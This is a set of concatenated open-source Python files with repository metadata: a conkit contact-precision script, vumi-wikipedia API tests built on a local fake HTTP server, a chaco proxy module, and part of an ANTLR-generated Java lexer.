"Inter-molecular predictions use two letter "
"convention, i.e AD for contacts between A and D.",
)
parser.add_argument("-d", dest="dtn", default=5, type=int, help="Minimum sequence separation [default: 5]")
parser.add_argument(
"-f",
dest="dfactor",
default=1.0,
type=float,
help="number of contacts to include relative to sequence length [default: 1.0]",
)
parser.add_argument("pdbfile")
parser.add_argument("pdbformat", choices=['pdb', 'mmcif'])
parser.add_argument("seqfile")
parser.add_argument("seqformat")
parser.add_argument("confile")
parser.add_argument("conformat")
args = parser.parse_args()
global logger
logger = conkit.command_line.setup_logging(level="info")
if args.pdbchain:
pdb = conkit.io.read(args.pdbfile, args.pdbformat)[args.pdbchain]
else:
pdb = conkit.io.read(args.pdbfile, args.pdbformat)[0]
seq = conkit.io.read(args.seqfile, args.seqformat)[0]
pdb.sequence = seq
pdb.set_sequence_register()
pdb = pdb.as_contactmap()
con = conkit.io.read(args.confile, args.conformat)[0]
con.sequence = seq
con.set_sequence_register()
if args.conformat in conkit.io.DISTANCE_FILE_PARSERS:
con = con.as_contactmap()
logger.info("Min sequence separation for contacting residues: %d", args.dtn)
logger.info("Contact list cutoff factor: %f * L", args.dfactor)
con.remove_neighbors(min_distance=args.dtn, inplace=True)
ncontacts = int(seq.seq_len * args.dfactor)
con.sort("raw_score", reverse=True, inplace=True)
con_sliced = con[:ncontacts]
con_matched = con_sliced.match(pdb)
precision = con_matched.precision
logger.info("Precision score: %f", precision)
if __name__ == "__main__":
import sys
import traceback
try:
main()
sys.exit(0)
except Exception as e:
if not isinstance(e, SystemExit):
msg = "".join(traceback.format_exception(*sys.exc_info()))
logger.critical(msg)
sys.exit(1)
|
rigdenlab/conkit
|
conkit/command_line/conkit_precision.py
|
Python
|
bsd-3-clause
| 4,257
|
import json
from functools import wraps
from pkg_resources import resource_stream
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks
from twisted.internet.protocol import Protocol, Factory
from twisted.trial.unittest import TestCase
from vumi.tests.helpers import VumiTestCase
from vumi.utils import HttpTimeoutError
from vumi_wikipedia.wikipedia_api import WikipediaAPI, ArticleExtract, APIError
class SectionMarkerCreator(object):
def __getitem__(self, key):
return u'\ufffd\ufffd%s\ufffd\ufffd' % (key,)
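# SectionMarkerCreator expands '%(N)s'-style placeholders into the section
# markers used by the extract parser: level N becomes u'\ufffd\ufffdN\ufffd\ufffd'.
# For example, make_extract(u'intro\n%(2)sTitle\nbody', url) produces an
# untitled intro section (u'intro') plus a level-2 section titled u'Title'
# with text u'body' (mirrors test_multiple_sections below).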
def make_extract(text, fullurl):
return ArticleExtract(text % SectionMarkerCreator(), fullurl)
class ArticleExtractTestCase(TestCase):
def assert_titles(self, ae, *titles):
self.assertEqual(list(titles), [s.title for s in ae.sections])
def assert_texts(self, ae, *texts):
self.assertEqual(list(texts), [s.text for s in ae.sections])
def assert_full_texts(self, ae, *texts):
self.assertEqual(list(texts), [s.full_text() for s in ae.sections])
def assert_section(self, section, title, text):
self.assertEqual(title, section.title)
self.assertEqual(text, section.text)
def assert_fullurl(self, ae, url):
self.assertEqual(ae.fullurl, url)
def test_fullurl(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract(u'foo\nbar', url)
self.assert_titles(ae, None)
self.assert_texts(ae, u'foo\nbar')
self.assert_fullurl(ae, url)
def test_one_section(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract(u'foo\nbar', url)
self.assert_titles(ae, None)
self.assert_texts(ae, u'foo\nbar')
def test_multiple_sections(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract(u'foo\n\n\n%(2)s bar \nbaz\n%(2)squux\n\n\nlol', url)
self.assert_titles(ae, None, u'bar', u'quux')
self.assert_texts(ae, u'foo', u'baz', u'lol')
def test_shallow_nested_sections(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract(u'%(2)sfoo\n%(3)s bar \ntext\n%(3)s baz\nblah', url)
self.assert_titles(ae, None, u'foo')
self.assert_texts(ae, u'', u'')
self.assert_full_texts(ae, u'', u'bar:\n\ntext\n\nbaz:\n\nblah')
[s20, s21] = ae.sections[1].get_subsections()
self.assert_section(s20, u'bar', u'text')
self.assert_section(s21, u'baz', u'blah')
def test_deep_nested_sections(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract('\n'.join([
u'%(2)ss1\nt1',
u'%(3)ss20\nt20',
u'%(3)ss21\nt21',
u'%(4)ss30\nt30',
u'%(4)ss31\nt31',
u'%(3)ss22\nt22',
]), url)
self.assert_titles(ae, None, u's1')
self.assert_texts(ae, u'', u't1')
self.assert_full_texts(ae, u'', '\n\n'.join([
u't1',
u's20:\n\nt20',
u's21:\n\nt21',
u's30:\n\nt30',
u's31:\n\nt31',
u's22:\n\nt22']))
[intro, s1] = ae.sections
[s20, s21, s22] = s1.get_subsections()
[s30, s31] = s21.get_subsections()
self.assertEqual([], intro.get_subsections())
self.assertEqual([], s20.get_subsections())
self.assertEqual([], s30.get_subsections())
self.assertEqual([], s31.get_subsections())
self.assertEqual([], s22.get_subsections())
self.assert_section(intro, None, u'')
self.assert_section(s1, u's1', u't1')
self.assert_section(s20, u's20', u't20')
self.assert_section(s21, u's21', u't21')
self.assert_section(s30, u's30', u't30')
self.assert_section(s31, u's31', u't31')
self.assert_section(s22, u's22', u't22')
def test_empty_input(self):
ae = ArticleExtract(u'', '')
self.assertEqual([u''], [s.text for s in ae.sections])
self.assertEqual([None], [s.title for s in ae.sections])
WIKIPEDIA_RESPONSES = json.load(
resource_stream(__name__, 'wikipedia_responses.json'))
def rewrite_request_line(request_line):
"""
Sort the request parameters in the URL path so tests don't rely on
deterministic dict ordering.
"""
method, sp, url_path = request_line.partition(' ')
path, q, params = url_path.partition('?')
params = '&'.join(sorted(params.split('&')))
url_path = q.join([path, params])
return sp.join([method, url_path])
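# e.g. rewrite_request_line('GET /w/api.php?b=2&a=1')
#      -> 'GET /w/api.php?a=1&b=2'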
class FakeHTTP(Protocol):
def dataReceived(self, data):
request_line, body = self.parse_request(data)
response = self.handle_request(request_line, body)
self.transport.write(response.encode('utf-8'))
self.transport.loseConnection()
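# FakeHTTP serves exactly one request per connection: parse the raw
# request, look up the canned response by request line, write it back,
# and close the transport.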
def parse_request(self, data):
headers, _, body = data.partition('\r\n\r\n')
headers = headers.splitlines()
request_line = rewrite_request_line(headers.pop(0).rsplit(' ', 1)[0])
self.assert_user_agent(headers)
return request_line, body
def assert_user_agent(self, headers):
expected_user_agent = getattr(
self.factory.testcase, 'expected_user_agent', None)
if expected_user_agent is not None:
[user_agent] = [h.split(': ', 1)[1] for h in headers
if h.lower().startswith('user-agent')]
self.factory.testcase.assertEqual(expected_user_agent, user_agent)
def build_response(self, response_data):
lines = ["HTTP/1.1 %s" % (response_data['response_code'],)]
body = response_data['response_body']
if isinstance(body, dict):
body = json.dumps(body)
lines.extend(['', body])
return '\r\n'.join(lines)
def handle_request(self, request_line, body):
check_redirect = getattr(self.factory.testcase, 'check_redirect', None)
if check_redirect is not None:
verb, _, path = request_line.partition(" ")
if path.startswith("/REDIRECT/"):
request_line = "%s %s" % (verb, path[len("/REDIRECT"):])
# We assume check_redirect is a list.
check_redirect.append(request_line)
else:
return self.build_redirect_response(path)
response_data = self.factory.response_data.get(request_line)
if not response_data:
self.factory.testcase.fail(
"Unexpected request: %s" % (request_line,))
resp_body = response_data["request_body"]
if resp_body:
resp_body = json.dumps(resp_body)
self.factory.testcase.assertEqual(resp_body, body)
return self.build_response(response_data)
def build_redirect_response(self, path):
return "\r\n".join([
"HTTP/1.1 301 TLS Redirect",
"Location: /REDIRECT%s" % (path,),
"",
"",
])
class FakeHTTPTestCaseMixin(object):
def _reformat_response_data(self, response_data):
reformatted_response_data = {}
for request_line, stuff in response_data.iteritems():
request_line = rewrite_request_line(request_line)
reformatted_response_data[request_line] = stuff
return reformatted_response_data
def start_webserver(self, response_data):
factory = Factory()
factory.protocol = FakeHTTP
factory.response_data = self._reformat_response_data(response_data)
factory.testcase = self
webserver = reactor.listenTCP(0, factory, interface='127.0.0.1')
self.add_cleanup(webserver.loseConnection)
addr = webserver.getHost()
webserver.url = "http://%s:%s/" % (addr.host, addr.port)
return webserver
def debug_api_call(func):
@wraps(func)
def wrapped_test(self):
self.wikipedia.PRINT_DEBUG = True
self.wikipedia.url = self.wikipedia.URL
return func(self)
return wrapped_test
class WikipediaAPITestCase(VumiTestCase, FakeHTTPTestCaseMixin):
def setUp(self):
self.fake_api = self.start_webserver(WIKIPEDIA_RESPONSES)
self.wikipedia = WikipediaAPI(self.fake_api.url, False)
def assert_api_result(self, api_result_d, expected):
return api_result_d.addCallback(self.assertEqual, expected)
@inlineCallbacks
def test_search_success(self):
yield self.assert_api_result(
self.wikipedia.search('wikipedia', limit=3),
[u'Wikipedia', u'Wikip\xe9dia', u'Main Page'])
# And again with a different request and result limit
yield self.assert_api_result(
self.wikipedia.search('vumi', limit=2),
[u'Arambagh Utsab', u'Vulpia microstachys'])
@inlineCallbacks
def test_search_custom_backend(self):
yield self.assert_api_result(
self.wikipedia.search('wikipedia', limit=3,
backend='CirrusSearch'),
[u'Wikipedia', u'Wikip\xe9dia', u'English Wikipedia'])
def test_search_error(self):
return self.assertFailure(self.wikipedia.search('.'), APIError)
@inlineCallbacks
def test_bad_response(self):
yield self.assertFailure(self.wikipedia.search('notjson'), APIError)
self.flushLoggedErrors()
def test_search_no_results(self):
return self.assert_api_result(
self.wikipedia.search('ncdkiuagdqpowebjkcs'), [])
def test_get_extract(self):
def assert_extract(extract):
self.assertEqual(4, len(extract.sections))
return self.wikipedia.get_extract('Cthulhu').addCallback(
assert_extract)
@inlineCallbacks
def test_user_agent(self):
self.expected_user_agent = self.wikipedia.USER_AGENT
yield self.wikipedia.get_extract('Cthulhu')
self.wikipedia = WikipediaAPI(self.fake_api.url, False, 'Bob Howard')
self.expected_user_agent = 'Bob Howard'
yield self.wikipedia.get_extract('Cthulhu')
def test_api_timeout(self):
self.wikipedia = WikipediaAPI(self.fake_api.url, False, api_timeout=0)
return self.assertFailure(
self.wikipedia.get_extract('Cthulhu'), HttpTimeoutError)
@inlineCallbacks
def test_redirect(self):
"""
If we get a 301 response, we must correctly redirect.
"""
# The redirect magic here is ugly and hacky, but making it cleaner
# would require rewriting most of the fake HTTP stuff.
self.check_redirect = []
# Test with a search.
yield self.assert_api_result(
self.wikipedia.search('wikipedia', limit=3),
[u'Wikipedia', u'Wikip\xe9dia', u'Main Page'])
self.assertEqual(len(self.check_redirect), 1)
# Test with an article extract.
extract = yield self.wikipedia.get_extract('Cthulhu')
self.assertEqual(4, len(extract.sections))
self.assertEqual(len(self.check_redirect), 2)
|
praekelt/vumi-wikipedia
|
vumi_wikipedia/tests/test_wikipedia_api.py
|
Python
|
bsd-3-clause
| 11,063
|
# proxy module
from __future__ import absolute_import
from chaco.abstract_controller import *
|
enthought/etsproxy
|
enthought/chaco/abstract_controller.py
|
Python
|
bsd-3-clause
| 94
|
# $ANTLR 3.1 ./Java.g 2013-07-16 16:21:24
import sys
from antlr3 import *
from antlr3.compat import set, frozenset
# for convenience in actions
HIDDEN = BaseRecognizer.HIDDEN
# token types
T__159=159
T__158=158
T__160=160
LEFT_SHIFT_ASSIGN=65
T__167=167
T__168=168
EOF=-1
T__165=165
T__166=166
T__163=163
T__164=164
T__161=161
T__162=162
TYPE_IMPORT_ON_DEMAND_DECLARATION=7
T__148=148
T__147=147
T__149=149
ABSTRACT_METHOD_DECLARATION=28
COMPILATION_UNIT=4
MARKER_ANNOTATION=47
THIS=77
TYPE_PARAMETERS=12
T__154=154
ENUM_DECLARATION=15
T__155=155
T__156=156
T__157=157
T__150=150
QUALIFIED_SUPER=83
T__151=151
T__152=152
T__153=153
T__139=139
T__138=138
LESS_THAN_OR_EQUAL_TO=68
T__137=137
ELEMENT_VALUE_PAIR=48
T__136=136
INNER_THIS=90
IntegerTypeSuffix=102
ALTERNATE_CONSTRUCTOR_INVOCATION=42
TYPE_ARGUMENTS=37
NON_WILD_TYPE_ARGUMENTS=89
T__141=141
T__142=142
T__140=140
T__145=145
T__146=146
T__143=143
T__144=144
T__126=126
T__125=125
UNSIGNED_RIGHT_SHIFT_ASSIGN=66
T__128=128
T__127=127
SINGLE_TYPE_IMPORT_DECLARATION=6
WS=111
T__129=129
UNQUALIFIED_SUPER=78
POST_INCREMENT_EXPRESSION=74
ANNOTATION_TYPE_BODY=51
FloatingPointLiteral=96
ANNOTATION_METHOD=52
NORMAL_ANNOTATION=45
JavaIDDigit=110
PREFIX_EXPRESSION=73
LEFT_SHIFT=70
CALL=81
EXPRESSION_STATEMENT=57
METHOD_DECLARATION=27
T__130=130
T__131=131
T__132=132
CLASS_DESIGNATOR=79
T__133=133
T__134=134
T__135=135
T__118=118
T__119=119
T__116=116
ANNOTATION_INTERFACE=50
T__117=117
ENHANCED_FOR_CONTROL=62
T__114=114
STATIC_IMPORT_ON_DEMAND_DECLARATION=9
T__115=115
T__124=124
T__123=123
T__122=122
T__121=121
T__120=120
HexDigit=101
QUALIFIED_THIS=82
T__202=202
EXPLICIT_GENERIC_INVOCATIONS=88
EXPRESSION_LIST=64
CONSTRUCTOR_DECLARATION=29
HexLiteral=93
CONSTRUCTOR_BODY=34
CLASS_BODY=21
StringLiteral=98
CLASS_DECLARATION=11
ENUM=108
UNSIGNED_RIGHT_SHIFT=71
BLOCK=53
OctalEscape=107
ARRAY_INITIALIZER=33
CAST=76
LOCAL_VARIABLE_DECLARATION=54
FloatTypeSuffix=104
FOR_INIT_DECLARATION=60
OctalLiteral=94
SIGNED_RIGHT_SHIFT=72
Identifier=100
UNQUALIFIED_CLASS_INSTANCE_CREATION=84
FOR_UPDATE=63
UNQUALIFIED_SUPERCLASS_CONSTRUCTOR_INVOCATION=43
NEW_ARRAY=87
ENUM_BODY=16
INSTANCE_INITIALIZER=24
FORMAL_PARAMETER=40
VOID=25
COMMENT=112
SELECT=36
ENUM_CONSTANT=18
SINGLE_ELEMENT_ANNOTATION=46
ARGUMENTS=91
LINE_COMMENT=113
ASSERT_STATEMENT=55
ARRAY_OF=32
ASSERT=99
LAST_FORMAL_PARAMETER=41
TYPE_BOUND=14
BASIC_FOR_CONTROL=59
SWITCH_BLOCK_STATEMENT_GROUP=58
ELEMENT_VALUE_ARRAY_INITIALIZER=49
T__200=200
T__201=201
METHOD_BODY=92
EMPTY_STATEMENT=56
INSTANTIATION=35
POST_DECREMENT_EXPRESSION=75
SINGLE_STATIC_IMPORT_DECLARATION=8
INTERFACE_DECLARATION=20
Letter=109
EscapeSequence=105
FIELD_DECLARATION=26
GREATER_THAN_OR_EQUAL_TO=69
CharacterLiteral=97
Exponent=103
MODIFIERS=10
VARIABLE_DECLARATOR=30
T__199=199
T__198=198
T__197=197
ENUM_CONSTANTS=17
T__196=196
T__195=195
FOR_INIT_EXPRESSION_LIST=61
T__194=194
ENUM_BODY_DECLARATIONS=19
T__193=193
T__192=192
T__191=191
T__190=190
WILDCARD=38
NEW_INITIALIZED_ARRAY=86
T__184=184
T__183=183
T__186=186
T__185=185
T__188=188
T__187=187
PACKAGE_DECLARATION=5
T__189=189
CONSTANT_DECLARATION=31
INTERFACE_BODY=22
T__180=180
T__182=182
T__181=181
SIGNED_RIGHT_SHIFT_ASSIGN=67
ARRAY_ACCESS=80
DecimalLiteral=95
T__175=175
T__174=174
T__173=173
FORMAL_PARAMETERS=39
T__172=172
TYPE_PARAMETER=13
T__179=179
T__178=178
T__177=177
T__176=176
QUALIFIED_SUPERCLASS_CONSTRUCTOR_INVOCATION=44
UnicodeEscape=106
T__171=171
T__170=170
QUALIFIED_CLASS_INSTANCE_CREATION=85
STATIC_INITIALIZER=23
T__169=169
class JavaLexer(Lexer):
grammarFileName = "./Java.g"
antlr_version = version_str_to_tuple("3.1")
antlr_version_str = "3.1"
def __init__(self, input=None, state=None):
if state is None:
state = RecognizerSharedState()
Lexer.__init__(self, input, state)
self.dfa18 = self.DFA18(
self, 18,
eot = self.DFA18_eot,
eof = self.DFA18_eof,
min = self.DFA18_min,
max = self.DFA18_max,
accept = self.DFA18_accept,
special = self.DFA18_special,
transition = self.DFA18_transition
)
self.dfa29 = self.DFA29(
self, 29,
eot = self.DFA29_eot,
eof = self.DFA29_eof,
min = self.DFA29_min,
max = self.DFA29_max,
accept = self.DFA29_accept,
special = self.DFA29_special,
transition = self.DFA29_transition
)
self.enumIsKeyword = False;
self.assertIsKeyword = True;
# $ANTLR start "T__114"
def mT__114(self, ):
try:
_type = T__114
_channel = DEFAULT_CHANNEL
# ./Java.g:12:8: ( 'package' )
# ./Java.g:12:10: 'package'
pass
self.match("package")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__114"
# $ANTLR start "T__115"
def mT__115(self, ):
try:
_type = T__115
_channel = DEFAULT_CHANNEL
# ./Java.g:13:8: ( ';' )
# ./Java.g:13:10: ';'
pass
self.match(59)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__115"
# $ANTLR start "T__116"
def mT__116(self, ):
try:
_type = T__116
_channel = DEFAULT_CHANNEL
# ./Java.g:14:8: ( 'import' )
# ./Java.g:14:10: 'import'
pass
self.match("import")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__116"
# $ANTLR start "T__117"
def mT__117(self, ):
try:
_type = T__117
_channel = DEFAULT_CHANNEL
# ./Java.g:15:8: ( 'static' )
# ./Java.g:15:10: 'static'
pass
self.match("static")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__117"
# $ANTLR start "T__118"
def mT__118(self, ):
try:
_type = T__118
_channel = DEFAULT_CHANNEL
# ./Java.g:16:8: ( '.' )
# ./Java.g:16:10: '.'
pass
self.match(46)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__118"
# $ANTLR start "T__119"
def mT__119(self, ):
try:
_type = T__119
_channel = DEFAULT_CHANNEL
# ./Java.g:17:8: ( '*' )
# ./Java.g:17:10: '*'
pass
self.match(42)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__119"
# $ANTLR start "T__120"
def mT__120(self, ):
try:
_type = T__120
_channel = DEFAULT_CHANNEL
# ./Java.g:18:8: ( 'class' )
# ./Java.g:18:10: 'class'
pass
self.match("class")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__120"
# $ANTLR start "T__121"
def mT__121(self, ):
try:
_type = T__121
_channel = DEFAULT_CHANNEL
# ./Java.g:19:8: ( 'extends' )
# ./Java.g:19:10: 'extends'
pass
self.match("extends")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__121"
# $ANTLR start "T__122"
def mT__122(self, ):
try:
_type = T__122
_channel = DEFAULT_CHANNEL
# ./Java.g:20:8: ( 'implements' )
# ./Java.g:20:10: 'implements'
pass
self.match("implements")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__122"
# $ANTLR start "T__123"
def mT__123(self, ):
try:
_type = T__123
_channel = DEFAULT_CHANNEL
# ./Java.g:21:8: ( '<' )
# ./Java.g:21:10: '<'
pass
self.match(60)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__123"
# $ANTLR start "T__124"
def mT__124(self, ):
try:
_type = T__124
_channel = DEFAULT_CHANNEL
# ./Java.g:22:8: ( ',' )
# ./Java.g:22:10: ','
pass
self.match(44)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__124"
# $ANTLR start "T__125"
def mT__125(self, ):
try:
_type = T__125
_channel = DEFAULT_CHANNEL
# ./Java.g:23:8: ( '>' )
# ./Java.g:23:10: '>'
pass
self.match(62)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__125"
# $ANTLR start "T__126"
def mT__126(self, ):
try:
_type = T__126
_channel = DEFAULT_CHANNEL
# ./Java.g:24:8: ( '&' )
# ./Java.g:24:10: '&'
pass
self.match(38)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__126"
# $ANTLR start "T__127"
def mT__127(self, ):
try:
_type = T__127
_channel = DEFAULT_CHANNEL
# ./Java.g:25:8: ( '{' )
# ./Java.g:25:10: '{'
pass
self.match(123)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__127"
# $ANTLR start "T__128"
def mT__128(self, ):
try:
_type = T__128
_channel = DEFAULT_CHANNEL
# ./Java.g:26:8: ( '}' )
# ./Java.g:26:10: '}'
pass
self.match(125)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__128"
# $ANTLR start "T__129"
def mT__129(self, ):
try:
_type = T__129
_channel = DEFAULT_CHANNEL
# ./Java.g:27:8: ( 'interface' )
# ./Java.g:27:10: 'interface'
pass
self.match("interface")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__129"
# $ANTLR start "T__130"
def mT__130(self, ):
try:
_type = T__130
_channel = DEFAULT_CHANNEL
# ./Java.g:28:8: ( 'void' )
# ./Java.g:28:10: 'void'
pass
self.match("void")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__130"
# $ANTLR start "T__131"
def mT__131(self, ):
try:
_type = T__131
_channel = DEFAULT_CHANNEL
# ./Java.g:29:8: ( '[' )
# ./Java.g:29:10: '['
pass
self.match(91)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__131"
# $ANTLR start "T__132"
def mT__132(self, ):
try:
_type = T__132
_channel = DEFAULT_CHANNEL
# ./Java.g:30:8: ( ']' )
# ./Java.g:30:10: ']'
pass
self.match(93)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__132"
# $ANTLR start "T__133"
def mT__133(self, ):
try:
_type = T__133
_channel = DEFAULT_CHANNEL
# ./Java.g:31:8: ( 'throws' )
# ./Java.g:31:10: 'throws'
pass
self.match("throws")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__133"
# $ANTLR start "T__134"
def mT__134(self, ):
try:
_type = T__134
_channel = DEFAULT_CHANNEL
# ./Java.g:32:8: ( '=' )
# ./Java.g:32:10: '='
pass
self.match(61)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__134"
# $ANTLR start "T__135"
def mT__135(self, ):
try:
_type = T__135
_channel = DEFAULT_CHANNEL
# ./Java.g:33:8: ( 'boolean' )
# ./Java.g:33:10: 'boolean'
pass
self.match("boolean")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__135"
# $ANTLR start "T__136"
def mT__136(self, ):
try:
_type = T__136
_channel = DEFAULT_CHANNEL
# ./Java.g:34:8: ( 'char' )
# ./Java.g:34:10: 'char'
pass
self.match("char")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__136"
# $ANTLR start "T__137"
def mT__137(self, ):
try:
_type = T__137
_channel = DEFAULT_CHANNEL
# ./Java.g:35:8: ( 'byte' )
# ./Java.g:35:10: 'byte'
pass
self.match("byte")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__137"
# $ANTLR start "T__138"
def mT__138(self, ):
try:
_type = T__138
_channel = DEFAULT_CHANNEL
# ./Java.g:36:8: ( 'short' )
# ./Java.g:36:10: 'short'
pass
self.match("short")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__138"
# $ANTLR start "T__139"
def mT__139(self, ):
try:
_type = T__139
_channel = DEFAULT_CHANNEL
# ./Java.g:37:8: ( 'int' )
# ./Java.g:37:10: 'int'
pass
self.match("int")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__139"
# $ANTLR start "T__140"
def mT__140(self, ):
try:
_type = T__140
_channel = DEFAULT_CHANNEL
# ./Java.g:38:8: ( 'long' )
# ./Java.g:38:10: 'long'
pass
self.match("long")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__140"
# $ANTLR start "T__141"
def mT__141(self, ):
try:
_type = T__141
_channel = DEFAULT_CHANNEL
# ./Java.g:39:8: ( 'float' )
# ./Java.g:39:10: 'float'
pass
self.match("float")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__141"
# $ANTLR start "T__142"
def mT__142(self, ):
try:
_type = T__142
_channel = DEFAULT_CHANNEL
# ./Java.g:40:8: ( 'double' )
# ./Java.g:40:10: 'double'
pass
self.match("double")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__142"
# $ANTLR start "T__143"
def mT__143(self, ):
try:
_type = T__143
_channel = DEFAULT_CHANNEL
# ./Java.g:41:8: ( '?' )
# ./Java.g:41:10: '?'
pass
self.match(63)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__143"
# $ANTLR start "T__144"
def mT__144(self, ):
try:
_type = T__144
_channel = DEFAULT_CHANNEL
# ./Java.g:42:8: ( 'super' )
# ./Java.g:42:10: 'super'
pass
self.match("super")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__144"
# $ANTLR start "T__145"
def mT__145(self, ):
try:
_type = T__145
_channel = DEFAULT_CHANNEL
# ./Java.g:43:8: ( '(' )
# ./Java.g:43:10: '('
pass
self.match(40)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__145"
# $ANTLR start "T__146"
def mT__146(self, ):
try:
_type = T__146
_channel = DEFAULT_CHANNEL
# ./Java.g:44:8: ( ')' )
# ./Java.g:44:10: ')'
pass
self.match(41)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__146"
# $ANTLR start "T__147"
def mT__147(self, ):
try:
_type = T__147
_channel = DEFAULT_CHANNEL
# ./Java.g:45:8: ( '...' )
# ./Java.g:45:10: '...'
pass
self.match("...")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__147"
# $ANTLR start "T__148"
def mT__148(self, ):
try:
_type = T__148
_channel = DEFAULT_CHANNEL
# ./Java.g:46:8: ( 'this' )
# ./Java.g:46:10: 'this'
pass
self.match("this")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__148"
# $ANTLR start "T__149"
def mT__149(self, ):
try:
_type = T__149
_channel = DEFAULT_CHANNEL
# ./Java.g:47:8: ( 'true' )
# ./Java.g:47:10: 'true'
pass
self.match("true")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__149"
# $ANTLR start "T__150"
def mT__150(self, ):
try:
_type = T__150
_channel = DEFAULT_CHANNEL
# ./Java.g:48:8: ( 'false' )
# ./Java.g:48:10: 'false'
pass
self.match("false")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__150"
# $ANTLR start "T__151"
def mT__151(self, ):
try:
_type = T__151
_channel = DEFAULT_CHANNEL
# ./Java.g:49:8: ( 'null' )
# ./Java.g:49:10: 'null'
pass
self.match("null")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__151"
# $ANTLR start "T__152"
def mT__152(self, ):
try:
_type = T__152
_channel = DEFAULT_CHANNEL
# ./Java.g:50:8: ( '@' )
# ./Java.g:50:10: '@'
pass
self.match(64)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__152"
# $ANTLR start "T__153"
def mT__153(self, ):
try:
_type = T__153
_channel = DEFAULT_CHANNEL
# ./Java.g:51:8: ( 'default' )
# ./Java.g:51:10: 'default'
pass
self.match("default")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__153"
# $ANTLR start "T__154"
def mT__154(self, ):
try:
_type = T__154
_channel = DEFAULT_CHANNEL
# ./Java.g:52:8: ( ':' )
# ./Java.g:52:10: ':'
pass
self.match(58)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__154"
# $ANTLR start "T__155"
def mT__155(self, ):
try:
_type = T__155
_channel = DEFAULT_CHANNEL
# ./Java.g:53:8: ( 'if' )
# ./Java.g:53:10: 'if'
pass
self.match("if")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__155"
# $ANTLR start "T__156"
def mT__156(self, ):
try:
_type = T__156
_channel = DEFAULT_CHANNEL
# ./Java.g:54:8: ( 'else' )
# ./Java.g:54:10: 'else'
pass
self.match("else")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__156"
# $ANTLR start "T__157"
def mT__157(self, ):
try:
_type = T__157
_channel = DEFAULT_CHANNEL
# ./Java.g:55:8: ( 'for' )
# ./Java.g:55:10: 'for'
pass
self.match("for")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__157"
# $ANTLR start "T__158"
def mT__158(self, ):
try:
_type = T__158
_channel = DEFAULT_CHANNEL
# ./Java.g:56:8: ( 'while' )
# ./Java.g:56:10: 'while'
pass
self.match("while")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__158"
# $ANTLR start "T__159"
def mT__159(self, ):
try:
_type = T__159
_channel = DEFAULT_CHANNEL
# ./Java.g:57:8: ( 'do' )
# ./Java.g:57:10: 'do'
pass
self.match("do")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__159"
# $ANTLR start "T__160"
def mT__160(self, ):
try:
_type = T__160
_channel = DEFAULT_CHANNEL
# ./Java.g:58:8: ( 'try' )
# ./Java.g:58:10: 'try'
pass
self.match("try")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__160"
# $ANTLR start "T__161"
def mT__161(self, ):
try:
_type = T__161
_channel = DEFAULT_CHANNEL
# ./Java.g:59:8: ( 'catch' )
# ./Java.g:59:10: 'catch'
pass
self.match("catch")
